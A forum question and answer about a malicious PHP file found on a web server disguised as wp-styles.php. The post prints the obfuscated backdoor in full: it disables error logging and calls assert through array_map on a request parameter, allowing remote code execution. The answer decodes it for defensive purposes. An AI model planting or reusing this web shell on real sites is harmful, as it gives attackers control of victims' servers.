# I found malicious PHP script on my server

Tags: php, malware

I just found this malicious PHP code on my server in a file named wp-styles.php - Please help me decode it.

```
@error_reporting(0); 
@ini_set("display_errors",0);    
@ini_set("log_errors",0); 
@ini_set("error_log",0); 
$my_str = "ammerw"; 
$my_str = str_replace("m", "s", $my_str); $my_str = str_replace("w", "t", $my_str); 
array_map($my_str, $_REQUEST\["0107e00d68f62ad87fbe5399c1300762"\]);
```

Comment: Show code and which part do you concern

Comment: https://www.php.net/manual/en/function.ini-set.php

Answer (score 0, accepted):

I think you have to dig a bit deeper. As you can see, it turns off any error reporting. The String "ammert" will convert into "assert". Then array_map used this string as a callback function and passes the value stored in $_REQUEST["0107e00d68f62ad87fbe5399c1300762"] as parameter.
If this value is a string, assert will run this code!
So you have to check what value is stored in $_REQUEST with the key above.
This can be very dangerous, depending on the code in the superglobal variable $_REQUEST. And please check, when this obcsure script is called.

Hope this helps.